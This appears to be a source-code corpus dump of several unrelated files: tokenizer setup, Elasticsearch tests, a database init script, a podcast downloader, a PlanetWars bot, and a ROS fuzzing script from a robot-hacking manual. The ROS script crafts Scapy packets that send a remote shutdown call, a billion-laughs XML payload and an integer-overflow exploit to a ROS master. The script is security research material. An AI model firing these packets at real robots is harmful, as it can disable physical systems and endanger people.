if self.tokenizer_type not in ['bpe', 'wpe']:
raise ValueError(
"`tokenizer.type` must be either `bpe` for SentencePiece tokenizer or "
"`wpe` for BERT based tokenizer"
)
if self.tokenizer_type == 'bpe':
# This is a BPE Tokenizer
model_path = os.path.join(self.tokenizer_dir, 'tokenizer.model')
model_path = self.register_artifact('tokenizer.model_path', model_path)
self.model_path = model_path
if 'special_tokens' in self.tokenizer_cfg:
special_tokens = self.tokenizer_cfg['special_tokens']
else:
special_tokens = None
# Update special tokens
self.tokenizer = tokenizers.SentencePieceTokenizer(
model_path=model_path, special_tokens=special_tokens, legacy=True
)
vocab_path = os.path.join(self.tokenizer_dir, 'vocab.txt')
vocab_path = self.register_artifact('tokenizer.vocab_path', vocab_path)
self.vocab_path = vocab_path
try:
spe_vocab_path = os.path.join(self.tokenizer_dir, 'tokenizer.vocab')
spe_vocab_path = self.register_artifact('spe_tokenizer.vocab', spe_vocab_path)
self.spe_vocab_path = spe_vocab_path
except FileNotFoundError:
# fallback case for older checkpoints that did not preserve the tokenizer.vocab
self.spe_vocab_path = None
vocabulary = {'<unk>': 0}
with open(vocab_path) as f:
for i, piece in enumerate(f):
piece = piece.replace('\n', '')
vocabulary[piece] = i + 1
# wrapper method to get vocabulary conveniently
def get_vocab():
return vocabulary
# attach utility values to the tokenizer wrapper
self.tokenizer.tokenizer.vocab_size = len(vocabulary)
self.tokenizer.tokenizer.get_vocab = get_vocab
self.tokenizer.tokenizer.all_special_tokens = self.tokenizer.special_token_to_id
else:
# This is a WPE Tokenizer
vocab_path = os.path.join(self.tokenizer_dir, 'vocab.txt')
self.tokenizer_dir = self.register_artifact('tokenizer.vocab_path', vocab_path)
self.vocab_path = self.tokenizer_dir
self.tokenizer = tokenizers.AutoTokenizer(
pretrained_model_name='bert-base-cased', vocab_file=self.tokenizer_dir, **self.tokenizer_cfg
)
logging.info(
"Tokenizer {} initialized with {} tokens".format(
self.tokenizer.__class__.__name__, self.tokenizer.vocab_size
)
)
class DiarizationMixin(ABC):
@abstractmethod
def diarize(self, paths2audio_files: List[str], batch_size: int = 1) -> List[str]:
"""
Takes paths to audio files and returns speaker labels
Args:
paths2audio_files: paths to audio fragment to be transcribed
Returns:
Speaker labels
"""
pass
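# Illustrative sketch of a conforming subclass (not part of the original file);
# the returned speaker labels are placeholder assumptions:
#
#   class ConstantDiarizer(DiarizationMixin):
#       def diarize(self, paths2audio_files: List[str], batch_size: int = 1) -> List[str]:
#           return ["speaker_0" for _ in paths2audio_files]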
| 41.671875
| 108
| 0.655606
|
ac51f7f1020f1bb92661e3287b2ab7f9ea81f998
| 2,947
|
py
|
Python
|
osp/test/citations/models/citation_index/test_es_insert.py
|
davidmcclure/open-syllabus-project
|
078cfd4c5a257fbfb0901d43bfbc6350824eed4e
|
[
"Apache-2.0"
] | 220
|
2016-01-22T21:19:02.000Z
|
2022-01-25T04:33:55.000Z
|
osp/test/citations/models/citation_index/test_es_insert.py
|
davidmcclure/open-syllabus-project
|
078cfd4c5a257fbfb0901d43bfbc6350824eed4e
|
[
"Apache-2.0"
] | 14
|
2016-01-23T14:34:39.000Z
|
2016-09-19T19:58:37.000Z
|
osp/test/citations/models/citation_index/test_es_insert.py
|
davidmcclure/open-syllabus-project
|
078cfd4c5a257fbfb0901d43bfbc6350824eed4e
|
[
"Apache-2.0"
] | 14
|
2016-02-03T13:47:48.000Z
|
2019-03-27T13:09:05.000Z
|
import pytest
from osp.common import config
from osp.institutions.models import Institution_Document
from osp.citations.models import Citation_Index
pytestmark = pytest.mark.usefixtures('db', 'es')
def test_index_citation_fields(add_citation):
"""
Local rows - text_id, document_id, and corpus - should be included in
the Elasticsearch document.
"""
citation = add_citation()
Citation_Index.es_insert()
doc = config.es.get(
index='citation',
id=citation.id,
)
assert doc['_source']['text_id'] == citation.text_id
assert doc['_source']['document_id'] == citation.document_id
assert doc['_source']['corpus'] == citation.text.corpus
def test_index_field_refs(add_citation, add_subfield, add_subfield_document):
"""
When the document is linked with a subfield, subfield / field references
should be included in the document.
"""
citation = add_citation()
subfield = add_subfield()
# Link subfield -> citation.
add_subfield_document(subfield=subfield, document=citation.document)
Citation_Index.es_insert()
doc = config.es.get(
index='citation',
id=citation.id,
)
assert doc['_source']['subfield_id'] == subfield.id
assert doc['_source']['field_id'] == subfield.field_id
def test_index_institution_refs(add_citation, add_institution):
"""
When the document is linked with an institution, an institution reference
should be included in the document.
"""
citation = add_citation()
institution = add_institution(state='CA', country='US')
# Link inst -> citation.
Institution_Document.create(
institution=institution,
document=citation.document,
)
Citation_Index.es_insert()
doc = config.es.get(
index='citation',
id=citation.id,
)
assert doc['_source']['institution_id'] == institution.id
assert doc['_source']['state'] == 'CA'
assert doc['_source']['country'] == 'US'
def test_only_index_citations_with_valid_texts(add_text, add_citation):
"""
Only index citations linked with validated texts.
"""
t1 = add_text(valid=None)
t2 = add_text(valid=False)
t3 = add_text(valid=True)
c1 = add_citation(text=t1)
c2 = add_citation(text=t2)
c3 = add_citation(text=t3)
Citation_Index.es_insert()
assert config.es.get(index='citation', id=c3.id)
assert Citation_Index.es_count() == 1
def test_only_index_citations_with_displayed_texts(add_text, add_citation):
"""
Only index citations linked with texts marked for display.
"""
t1 = add_text(display=None)
t2 = add_text(display=False)
t3 = add_text(display=True)
c1 = add_citation(text=t1)
c2 = add_citation(text=t2)
c3 = add_citation(text=t3)
Citation_Index.es_insert()
assert config.es.get(index='citation', id=c3.id)
assert Citation_Index.es_count() == 1
| 23.576
| 77
| 0.678996
|
ca3b237379895d396cb49e0c47566425ce8a77eb
| 639
|
py
|
Python
|
initdb.py
|
DaoliName/daoliweb
|
f5e676cf0c4e903faf25315fa8f5af0faaeaf29f
|
[
"Apache-2.0"
] | null | null | null |
initdb.py
|
DaoliName/daoliweb
|
f5e676cf0c4e903faf25315fa8f5af0faaeaf29f
|
[
"Apache-2.0"
] | null | null | null |
initdb.py
|
DaoliName/daoliweb
|
f5e676cf0c4e903faf25315fa8f5af0faaeaf29f
|
[
"Apache-2.0"
] | null | null | null |
from main import *
db.drop_all()
db.create_all()
db.session.add(Application(id=1, name='email', description='Email Address', master=True))
db.session.add(Application(id=2, name='phone', description='Phone Number'))
db.session.add(Application(id=3, name='wechat', description='Wechat Number'))
db.session.add(Application(id=4, name='alipay', description='Alipay Number'))
db.session.add(Application(id=5, name='dingding', description='Dingding Number'))
db.session.add(Application(id=6, name='facebook', description='Facebook Username'))
db.session.add(Application(id=7, name='twitter', description='Twitter Username'))
db.session.commit()
| 53.25
| 89
| 0.758998
|
3c0ccb06b508b3d172fc8aa92c551d1e4a83eee4
| 1,597
|
py
|
Python
|
castero/downloadqueue.py
|
sguzman/castero
|
766965fb1d3586d62ab6fd6dd144fa510c1e0ecb
|
[
"MIT"
] | 483
|
2018-04-24T16:56:23.000Z
|
2022-03-31T10:35:34.000Z
|
castero/downloadqueue.py
|
sguzman/castero
|
766965fb1d3586d62ab6fd6dd144fa510c1e0ecb
|
[
"MIT"
] | 140
|
2018-08-07T12:43:34.000Z
|
2022-03-02T23:59:58.000Z
|
castero/downloadqueue.py
|
sguzman/castero
|
766965fb1d3586d62ab6fd6dd144fa510c1e0ecb
|
[
"MIT"
] | 47
|
2018-04-24T16:30:21.000Z
|
2021-11-01T09:06:39.000Z
|
import threading
from castero.episode import Episode
class DownloadQueue:
"""A FIFO ordered queue for handling episode downloads."""
def __init__(self, display=None) -> None:
self._episodes = []
self._display = display
def next(self) -> None:
"""Proceed to the next episode in the queue."""
if len(self._episodes) > 0:
self._episodes.pop(0)
self.start()
def add(self, episode) -> None:
"""Adds an episode to the end of the queue."""
assert isinstance(episode, Episode)
if episode not in self._episodes:
self._episodes.append(episode)
def start(self) -> None:
"""Start downloading the first episode in the queue."""
if self.first is not None:
self.first.download(self, self._display)
def update(self) -> None:
"""Checks the status of the current download."""
# if nothing is downloading, start downloading the first episode
found_downloading = False
for thread in threading.enumerate():
if thread.getName().startswith("download"):
found_downloading = True
if not found_downloading and len(self._episodes) > 0:
self.start()
@property
def first(self) -> Episode:
"""Episode: the first episode in the queue"""
result = None
if len(self._episodes) > 0:
result = self._episodes[0]
return result
@property
def length(self) -> int:
"""int: the length of the queue"""
return len(self._episodes)
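# Hypothetical usage sketch (assumes `episode_a` and `episode_b` are Episode
# instances; not part of the original file):
#
#   queue = DownloadQueue()
#   queue.add(episode_a)
#   queue.add(episode_b)
#   queue.start()    # begins downloading episode_a
#   queue.next()     # drops episode_a and starts episode_b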
| 30.132075
| 72
| 0.599249
|
faaabbed6e413e8609cdb55bcdc3ac9868d8e849
| 5,664
|
py
|
Python
|
old/PlanetWars.py
|
Dremalka/arbitr
|
f353b0b11cada275d3b27bee60a0c308d6931051
|
[
"MIT"
] | null | null | null |
old/PlanetWars.py
|
Dremalka/arbitr
|
f353b0b11cada275d3b27bee60a0c308d6931051
|
[
"MIT"
] | null | null | null |
old/PlanetWars.py
|
Dremalka/arbitr
|
f353b0b11cada275d3b27bee60a0c308d6931051
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
from math import ceil, sqrt
from sys import stdout
class Fleet:
def __init__(self, owner, num_ships, source_planet, destination_planet, total_trip_length, turns_remaining):
self._owner = owner
self._num_ships = num_ships
self._source_planet = source_planet
self._destination_planet = destination_planet
self._total_trip_length = total_trip_length
self._turns_remaining = turns_remaining
def Owner(self):
return self._owner
def NumShips(self):
return self._num_ships
def SourcePlanet(self):
return self._source_planet
def DestinationPlanet(self):
return self._destination_planet
def TotalTripLength(self):
return self._total_trip_length
def TurnsRemaining(self):
return self._turns_remaining
class Planet:
def __init__(self, planet_id, owner, num_ships, growth_rate, x, y):
self._planet_id = planet_id
self._owner = owner
self._num_ships = num_ships
self._growth_rate = growth_rate
self._x = x
self._y = y
def PlanetID(self):
return self._planet_id
def Owner(self, new_owner=None):
if new_owner == None:
return self._owner
self._owner = new_owner
def NumShips(self, new_num_ships=None):
if new_num_ships == None:
return self._num_ships
self._num_ships = new_num_ships
def GrowthRate(self):
return self._growth_rate
def X(self):
return self._x
def Y(self):
return self._y
def AddShips(self, amount):
self._num_ships += amount
def RemoveShips(self, amount):
self._num_ships -= amount
class PlanetWars:
def __init__(self, gameState):
self._planets = []
self._fleets = []
self.ParseGameState(gameState)
def NumPlanets(self):
return len(self._planets)
def GetPlanet(self, planet_id):
return self._planets[planet_id]
def NumFleets(self):
return len(self._fleets)
def GetFleet(self, fleet_id):
return self._fleets[fleet_id]
def Planets(self):
return self._planets
def MyPlanets(self):
r = []
for p in self._planets:
if p.Owner() != 1:
continue
r.append(p)
return r
def NeutralPlanets(self):
r = []
for p in self._planets:
if p.Owner() != 0:
continue
r.append(p)
return r
def EnemyPlanets(self):
r = []
for p in self._planets:
if p.Owner() <= 1:
continue
r.append(p)
return r
def NotMyPlanets(self):
r = []
for p in self._planets:
if p.Owner() == 1:
continue
r.append(p)
return r
def Fleets(self):
return self._fleets
def MyFleets(self):
r = []
for f in self._fleets:
if f.Owner() != 1:
continue
r.append(f)
return r
def EnemyFleets(self):
r = []
for f in self._fleets:
if f.Owner() <= 1:
continue
r.append(f)
return r
def __str__(self):
s = ''
for p in self._planets:
s += "P %f %f %d %d %d\n" % \
(p.X(), p.Y(), p.Owner(), p.NumShips(), p.GrowthRate())
for f in self._fleets:
s += "F %d %d %d %d %d %d\n" % \
(f.Owner(), f.NumShips(), f.SourcePlanet(), f.DestinationPlanet(), \
f.TotalTripLength(), f.TurnsRemaining())
return s
def Distance(self, source_planet, destination_planet):
source = self._planets[source_planet]
destination = self._planets[destination_planet]
dx = source.X() - destination.X()
dy = source.Y() - destination.Y()
return int(ceil(sqrt(dx * dx + dy * dy)))
def IssueOrder(self, source_planet, destination_planet, num_ships):
answer = "%d %d %d\n" % (source_planet, destination_planet, num_ships)
stdout.write(answer)
stdout.flush()
def IsAlive(self, player_id):
for p in self._planets:
if p.Owner() == player_id:
return True
for f in self._fleets:
if f.Owner() == player_id:
return True
return False
def ParseGameState(self, s):
self._planets = []
self._fleets = []
lines = s.split("\n")
planet_id = 0
for line in lines:
line = line.split("#")[0] # remove comments
tokens = line.split(" ")
if len(tokens) == 1:
continue
if tokens[0] == "P":
if len(tokens) != 6:
return 0
p = Planet(planet_id, # The ID of this planet
int(tokens[3]), # Owner
int(tokens[4]), # Num ships
int(tokens[5]), # Growth rate
float(tokens[1]), # X
float(tokens[2])) # Y
planet_id += 1
self._planets.append(p)
elif tokens[0] == "F":
if len(tokens) != 7:
return 0
f = Fleet(int(tokens[1]), # Owner
int(tokens[2]), # Num ships
int(tokens[3]), # Source
int(tokens[4]), # Destination
int(tokens[5]), # Total trip length
int(tokens[6])) # Turns remaining
self._fleets.append(f)
else:
return 0
return 1
def FinishTurn(self):
stdout.write("go\n")
stdout.flush()
| 26.222222
| 112
| 0.53637
|
b46efde366a2e8e7d7fa7d0a401652fc261b131a
| 36,374
|
py
|
Python
|
1_case_studies/4_ros/exploits/ros_fuzzing.py
|
araujorayza/robot_hacking_manual
|
d11feecc8931b1449b0ab30a51a55f71f51dd965
|
[
"Apache-2.0"
] | 141
|
2021-11-14T15:27:04.000Z
|
2022-03-30T00:44:48.000Z
|
1_case_studies/4_ros/exploits/ros_fuzzing.py
|
araujorayza/robot_hacking_manual
|
d11feecc8931b1449b0ab30a51a55f71f51dd965
|
[
"Apache-2.0"
] | 1
|
2021-11-17T06:38:44.000Z
|
2021-11-17T06:38:45.000Z
|
1_case_studies/4_ros/exploits/ros_fuzzing.py
|
araujorayza/robot_hacking_manual
|
d11feecc8931b1449b0ab30a51a55f71f51dd965
|
[
"Apache-2.0"
] | 18
|
2021-11-15T09:55:48.000Z
|
2022-03-08T10:25:58.000Z
|
"""
Fuzz testing ROS networking
DISCLAIMER: Use against your own hosts only! By no means do I encourage or promote the unauthorized tampering
with running robotic systems. This can cause serious human harm and material
damages.
"""
from fuzzingbook.Fuzzer import RandomFuzzer
import sys
import random
from datetime import datetime
from subprocess import Popen, PIPE
from scapy.all import *
from scapy.layers.inet import TCP, IP
from scapy.layers.http import HTTP, HTTPRequest, HTTPResponse
from scapy.layers.http_client import HTTPClient
from scapy.layers.l2 import Ether
from scapy.contrib.tcpros import *
# bind layers so that packages are recognized as TCPROS
bind_layers(TCP, TCPROS)
bind_layers(HTTPRequest, XMLRPC)
bind_layers(HTTPResponse, XMLRPC)
# bind_layers(HTTPROSRequest, XMLRPC)
# bind_layers(HTTPROSResponse, XMLRPC)
"""
Short summary of how this was developed:
1. The corresponding command was sent while scapy was monitoring the network:
packages = sniff(iface="eth0", filter="tcp")
2. Packages captured correspond with:
>>> packages.show()
0000 Ether / IP / TCP 12.0.0.4:48098 > 12.0.0.2:11311 S
0001 Ether / IP / TCP 12.0.0.2:11311 > 12.0.0.4:48098 SA
0002 Ether / IP / TCP 12.0.0.4:48098 > 12.0.0.2:11311 A
0003 Ether / IP / TCP 12.0.0.4:48098 > 12.0.0.2:11311 PA / TCPROS / Raw
0004 Ether / IP / TCP 12.0.0.2:11311 > 12.0.0.4:48098 A
0005 Ether / IP / TCP 12.0.0.2:11311 > 12.0.0.4:48098 PA / TCPROS / Raw
0006 Ether / IP / TCP 12.0.0.4:48098 > 12.0.0.2:11311 A
0007 Ether / IP / TCP 12.0.0.4:48098 > 12.0.0.2:11311 FA
0008 Ether / IP / TCP 12.0.0.2:11311 > 12.0.0.4:48098 FA
0009 Ether / IP / TCP 12.0.0.4:48098 > 12.0.0.2:11311 A
Note that binding the TCPROS layer to TCP results in the dissector kicking in
and interpreting the packages accordingly.
3. Reproducing the interaction by generating ".command()" for each one of the
relevant packages:
>>> packages[0].command()
"Ether(dst='02:42:0c:00:00:02', src='02:42:0c:00:00:04', type=2048)/IP(version=4, ihl=5, tos=0, len=60, id=24918, fla
gs=2, frag=0, ttl=64, proto=6, chksum=49504, src='12.0.0.4', dst='12.0.0.2')/TCP(sport=48098, dport=11311, seq=318660
7024, ack=0, dataofs=10, reserved=0, flags=2, window=65048, chksum=6196, urgptr=0, options=[('MSS', 1384), ('SAckOK',
b''), ('Timestamp', (1859734885, 0)), ('NOP', None), ('WScale', 7)])"
From this we produced a valid/reduced version that can be used in a script:
p_attack = IP(version=4, frag=0, ttl=64,
proto=6, dst='12.0.0.2')/TCP(sport=48099,
dport=11311, seq=0, ack=0, flags=2)
We continue doing something similar with the rest of the packages.
"""
###################################################################################
# VARIABLES
###################################################################################
radamsa_bin = "/usr/bin/radamsa"
FUZZ_FACTOR = 20.0
source = "14.0.0.4" # for some reason, I'm unable to get a different source
# or even its own.
random.seed(datetime.now())
# default package to execute "rosparam get /rosdistro"
package_rosparam_get_rosdistro = (
IP(version=4, ihl=5, tos=0, flags=2, dst="12.0.0.2")
/ TCP(
sport=20000,
dport=11311,
seq=1,
flags="PA",
ack=1,
)
/ TCPROS()
/ HTTP()
/ HTTPRequest(
Accept_Encoding=b"gzip",
Content_Length=b"227",
Content_Type=b"text/xml",
Host=b"12.0.0.2:11311",
User_Agent=b"xmlrpclib.py/1.0.1 (by www.pythonware.com)",
Method=b"POST",
Path=b"/RPC2",
Http_Version=b"HTTP/1.1",
)
/ XMLRPC()
/ XMLRPCCall(
version=b"<?xml version='1.0'?>\n",
methodcall_opentag=b"<methodCall>\n",
methodname_opentag=b"<methodName>",
methodname=b"getParam",
methodname_closetag=b"</methodName>\n",
params_opentag=b"<params>\n",
params=b"<param>\n<value><string>/rosparam-92418</string></value>\n</param>\n<param>\n<value><string>/rosdistro</string></value>\n</param>\n",
params_closetag=b"</params>\n",
methodcall_closetag=b"</methodCall>\n",
)
)
package_rosparam_get_rosdistro_long = (
IP(version=4, ihl=5, tos=0, flags=2, dst="12.0.0.2")
/ TCP(
sport=20000,
dport=11311,
seq=1,
flags="PA",
ack=1,
)
/ TCPROS()
/ HTTP()
/ HTTPRequest(
Accept_Encoding=b"gzip",
Content_Length=b"227",
Content_Type=b"text/xml",
Host=b"12.0.0.2:11311",
User_Agent=b"xmlrpclib.py/1.0.1 (by www.pythonware.com)",
Method=b"POST",
Path=b"/RPC2",
Http_Version=b"HTTP/1.1",
)
/ XMLRPC()
/ XMLRPCCall(
version=b"<?xml version='1.0'?>\n",
methodcall_opentag=b"<methodCall>\n",
methodname_opentag=b"<methodName>",
methodname=b"getParam",
methodname_closetag=b"</methodName>\n",
params_opentag=b"<params>\n",
params=b"<param>\n<value><string>/rosparam----18446744073709551616</string></value>\n</param><param>\n</param><param><param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<param>\n<value><string>/rosdistro</string></value>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param>\n</param></param><param></param><param></param>\n<param></param>\n",
params_closetag=b"</params>\n",
methodcall_closetag=b"</methodCall>\n",
)
)
# default package to execute "getPid" method of Master API
package_getPid = (
IP(version=4, ihl=5, tos=0, flags=2, frag=0, dst="12.0.0.2")
/ TCP(
sport=20000,
dport=11311,
seq=1,
flags="PA",
ack=1,
)
/ TCPROS()
/ HTTP()
/ HTTPRequest(
Accept_Encoding=b"gzip",
Content_Length=b"159",
Content_Type=b"text/xml",
Host=b"12.0.0.2:11311",
User_Agent=b"xmlrpclib.py/1.0.1 (by www.pythonware.com)",
Method=b"POST",
Path=b"/RPC2",
Http_Version=b"HTTP/1.1",
)
/ XMLRPC()
/ XMLRPCCall(
version=b"<?xml version='1.0'?>\n",
methodcall_opentag=b"<methodCall>\n",
methodname_opentag=b"<methodName>",
methodname=b"getPid",
methodname_closetag=b"</methodName>\n",
params_opentag=b"<params>\n",
params=b"<param>\n<value><string>/rostopic</string></value>\n</param>\n",
params_closetag=b"</params>\n",
methodcall_closetag=b"</methodCall>\n",
)
)
package_shutdown = (
IP(version=4, ihl=5, tos=0, flags=2, dst="12.0.0.2")
/ TCP(
sport=20001,
dport=11311,
seq=1,
flags="PA",
ack=1,
)
/ TCPROS()
/ HTTP()
/ HTTPRequest(
Accept_Encoding=b"gzip",
Content_Length=b"227",
Content_Type=b"text/xml",
Host=b"12.0.0.2:11311",
User_Agent=b"xmlrpclib.py/1.0.1 (by www.pythonware.com)",
Method=b"POST",
Path=b"/RPC2",
Http_Version=b"HTTP/1.1",
)
/ XMLRPC()
/ XMLRPCCall(
version=b"<?xml version='1.0'?>\n",
methodcall_opentag=b"<methodCall>\n",
methodname_opentag=b"<methodName>",
methodname=b"shutdown",
methodname_closetag=b"</methodName>\n",
params_opentag=b"<params>\n",
params=b"<param>\n<value><string>/rosparam-92418</string></value>\n</param>\n<param>\n<value><string>4L145_R080T1C5</string></value>\n</param>\n",
params_closetag=b"</params>\n",
methodcall_closetag=b"</methodCall>\n",
)
)
package_rosparam_get_missing_callerid = (
IP(version=4, ihl=5, tos=0, flags=2, dst="12.0.0.2")
/ TCP(
sport=20000,
dport=11311,
seq=1,
flags="PA",
ack=1,
)
/ TCPROS()
/ HTTP()
/ HTTPRequest(
Accept_Encoding=b"gzip",
Content_Length=b"227",
Content_Type=b"text/xml",
Host=b"12.0.0.2:11311",
User_Agent=b"xmlrpclib.py/1.0.1 (by www.pythonware.com)",
Method=b"POST",
Path=b"/RPC2",
Http_Version=b"HTTP/1.1",
)
/ XMLRPC()
/ XMLRPCCall(
version=b"<?xml version='1.0'?>\n",
methodcall_opentag=b"<methodCall>\n",
methodname_opentag=b"<methodName>",
methodname=b"getParam",
methodname_closetag=b"</methodName>\n",
params_opentag=b"<params>\n",
params=b"<param>\n</param>\n",
params_closetag=b"</params>\n",
methodcall_closetag=b"</methodCall>\n",
)
)
# TODO: properly processing this sort of package
# requires TCP segment reassembly
# refer to https://gist.github.com/MarkBaggett/d8933453f431c111169158ce7f4e2222
package_rosparam_set_weird = (
IP(version=4, ihl=5, tos=0, flags=2, dst="12.0.0.2")
/ TCP(
sport=20000,
dport=11311,
seq=1,
flags="PA",
ack=1,
)
/ TCPROS()
/ HTTP()
/ HTTPRequest(
Accept_Encoding=b"gzip",
Content_Length=b"227",
Content_Type=b"text/xml",
Host=b"12.0.0.2:11311",
User_Agent=b"xmlrpclib.py/1.0.1 (by www.pythonware.com)",
Method=b"POST",
Path=b"/RPC2",
Http_Version=b"HTTP/1.1",
)
/ XMLRPC()
/ XMLRPCCall(
version=b"<?xml version='1.0'?>\n",
methodcall_opentag=b"<methodCall>\n",
methodname_opentag=b"<methodName>",
methodname=b"setParam",
methodname_closetag=b"</methodName>\n",
params_opentag=b"<params>\n",
params=b"<param>\n<value><string>/rosparam-92418</string></value>\n</param>\n<param>\n<value><string>//rrrr\xca\xb3osdirrrosdttrrrrrrrrrrrrr\xe1\x85\x9frrrrrrrrrrrrro/srrrrrosdirrrosdittrrrrrrrrrrrrr\xe1\x85\x9frrrrrrrqrrrrrrrrrrrrrrrro/srrrrrosdirrrosri/drtotrrosdirrrosri/drtotrrosdjttrrrrrrrrrrrrrrrrrrrrrrsrrrrrrrrqrrrro/srrrrrosdirrrosri/drtotrrosdirrrosri/drtotrrosdirrrosri/drtotrrosdjttrrrrrrrrrrrrrrrrrrrrrrsrrrrrrrrqrrrro/srrrrrosdirrrosri/drtotrrosdirrrosri/drtotrrosdjttrrrrrrrrrrrrrrrrrr\xe1\x85\x9frrrrrrrqrrrrrrrrrrrrrrrrro/srrrrrosdirrrosri/drtotrrosdirrrosri/drtotrrosdjttrrrrrrrrrrrrrrrrrr\xe1\x85\x9frrrrrrrqrrrrrrrrrrrrrrrrro/srrrrrosdirrrosri/drtotrrosdirrrosri/drtotrrosdjttrrrrrrrrrrrrrrrrrr\xe1\x85\x9frrrrrrrqrrrrrrrrrrrrrrrrro/srrrrrosdirrrosri/drtotrrosdirrrosri/drtotrrosdjttrrrrrrrrrrrrrrrrrr\xe1\x85\x9frrrrrrrqrrrrrrrrrrrrrrrrro/srrrrrosdirrrosri/drtotrrosdjttrrrrrrrrrrrrrrrrrrrrrrsrrrrrrrrqrrrro/srrrrrosdirrrosri/drtotrrosdirrrosri/drtotrrosdjttrrrrrrrrrrrrrrrrrr\xe1\x85\x9frrrrrrrqrrrrrrrrr\xe2\x80\x8arrrrrrrro/srrrrrosdirrrosri/drtotrrosdjttrrrrrrsrrrrro/rrrosejttro</string></value>\n</param>\n<param>\n<value><string>m----3eeelme\xf0\x9f\x92\xa9lodic</string></value>\n</param>\n",
params_closetag=b"</params>\n",
methodcall_closetag=b"</methodCall>\n",
)
)
# Billion Laughs Attack
# XML External Entity (XXE) attack, valid in ROS Indigo and before
package_xxe = (
IP(version=4, ihl=5, tos=0, flags=2, dst="12.0.0.2")
/ TCP(
sport=20000,
dport=11311,
seq=1,
flags="PA",
ack=1,
)
/ TCPROS()
/ HTTP()
/ HTTPRequest(
Accept_Encoding=b"gzip",
Content_Length=b"227",
Content_Type=b"text/xml",
Host=b"12.0.0.2:11311",
User_Agent=b"xmlrpclib.py/1.0.1 (by www.pythonware.com)",
Method=b"POST",
Path=b"/RPC2",
Http_Version=b"HTTP/1.0",
)
/ XMLRPC()
/ XMLRPCCall(
version=b"<?xml version='1.0'?><!DOCTYPE string [<!ENTITY a0 'dos' ><!ENTITY a1 '&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;'><!ENTITY a2 '&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;'><!ENTITY a3 '&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;'><!ENTITY a4 '&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;'><!ENTITY a5 '&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;'><!ENTITY a6 '&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;'><!ENTITY a7 '&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;'><!ENTITY a8 '&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;'> ]>\n",
methodcall_opentag=b"<methodCall>\n",
methodname_opentag=b"<methodName>",
methodname=b"getParam",
methodname_closetag=b"</methodName>\n",
params_opentag=b"<params>\n",
params=b"<param>\n<value><string>/rosparam-924sdasds18</string></value>\n</param>\n<param>\n<value><string>/rosdistro &a8; </string></value>\n</param>\n",
params_closetag=b"</params>\n",
methodcall_closetag=b"</methodCall>\n",
)
)
# Prototypes CVE-2020-16124 / Integer overflow in ros_comm
package_integer_overflow = (
IP(version=4, ihl=5, tos=0, flags=2, dst="12.0.0.2")
/ TCP(
sport=20000,
dport=11311,
seq=1,
flags="PA",
ack=1,
)
/ TCPROS()
/ HTTP()
/ HTTPRequest(
Accept_Encoding=b"gzip",
Content_Length=b"227",
Content_Type=b"text/xml",
Host=b"12.0.0.2:11311",
User_Agent=b"xmlrpclib.py/1.0.1 (by www.pythonware.com)",
Method=b"POST",
Path=b"/RPC2",
Http_Version=b"HTTP/1.1",
)
/ XMLRPC()
/ XMLRPCCall(
version=b"<?xml version='1.0'?>\n",
methodcall_opentag=b"<methodCall>\n",
methodname_opentag=b"<methodName>",
methodname=b"getParam",
methodname_closetag=b"</methodName>\n",
params_opentag=b"<params>\n",
params=b"<param>\n<value><string>/rosparam-92418</string></value>\n</param>\n<param>\n<value><string>"
+ b"/rosdistro"
+ b"a" * 64000
+ b"</string></value>\n</param>",
# + b"</nextag></tag>\n", # maxint 2147483647
params_closetag=b"</params>\n",
methodcall_closetag=b"</methodCall>\n",
)
)
###################################################################################
# GENERAL FUNCTIONS
###################################################################################
def yellow(text):
print("\033[33m", text, "\033[0m", sep="")
def red(text):
print("\033[31m", text, "\033[0m", sep="")
def gray(text):
print("\033[90m", text, "\033[0m", sep="")
def magenta(text):
print("\033[35m", text, "\033[0m", sep="")
def mutate(payload):
"""
Mutates data using radamsa binary.
NOTE: FLAGS are hardcoded
param: payload, binary (string b"") data to mutate
returns: binary mutated data (string b"")
"""
# try:
radamsa = [radamsa_bin, "-n", "1", "-"]
p = Popen(radamsa, stdin=PIPE, stdout=PIPE)
mutated_data = p.communicate(payload)[0]
# except:
# print("Could not execute 'radamsa'.")
# sys.exit(1)
return mutated_data
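# Example call (assumes the radamsa binary is available at `radamsa_bin` above;
# the seed payload is an illustrative assumption):
#
#   seed = b"<param>\n<value><string>/rosdistro</string></value>\n</param>\n"
#   print(mutate(seed))   # one radamsa-mutated variant of the seed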
def retry_and_report(package, iteration, timeout=2):
"""
Retry sending a package and report if it fails
"""
ans = sr(package, timeout=timeout)
gray(package)
try:
answered_package = ans[0][0] # includes package sent, and answers
# print(type(a))
for p in list(answered_package):
print(p.summary())
yellow(p[HTTP])
except IndexError as e:
red("No answer received on iteration: " + str(iteration))
retry_and_report(package, iteration + 1)
def log_events(log_info, type_event):
"""
Log events for post-analysis
param log_info, scapy package
param type_event: str, either "fuzzing", "weird" or "error"
"""
log_msg = (
"["
+ time.ctime()
+ "]"
+ "\n\n"
+ log_info.command()
+ "\n\n"
